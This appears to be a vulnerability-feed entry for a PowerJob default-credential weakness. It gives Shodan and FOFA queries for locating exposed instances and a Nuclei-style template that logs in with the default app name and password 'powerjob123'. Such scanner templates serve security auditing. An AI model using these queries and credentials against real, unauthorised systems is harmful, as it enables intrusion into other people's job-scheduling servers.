powerjob-default-login: PowerJob - Default Login

Date: 2025-08-01 | Affected software: PowerJob | PoC: public

Vulnerability description

PowerJob default login credentials were discovered.
Shodan query: http.title:"PowerJob"
FOFA query: title="PowerJob"

PoC code [public]

id: powerjob-default-login

info:
  name: PowerJob - Default Login
  author: j4vaovo
  severity: high
  description: |
    PowerJob default login credentials were discovered.
  reference:
    - https://www.yuque.com/powerjob/guidence/trial
  classification:
    cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: powerjob
    product: powerjob
    shodan-query: http.title:"PowerJob"
    fofa-query: title="PowerJob"
  tags: powerjob,default-login,vuln

http:
  - raw:
      - |
        POST /appInfo/assert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"appName":{{username}},"password":{{password}}}

    attack: pitchfork
    payloads:
      username:
        - '"powerjob-worker-samples"'
      password:
        - '"powerjob123"'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":true,"data":'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008d4fd387b1037d3958bdb972eeb05089b682418046bbdc1fe8433a9b7e4bb7ed022032e3e7bb9766c61f404185953661c6c48be368437e11fb7c26623ba62332d3bf:922c64590222798bb761d5b6d8e72950
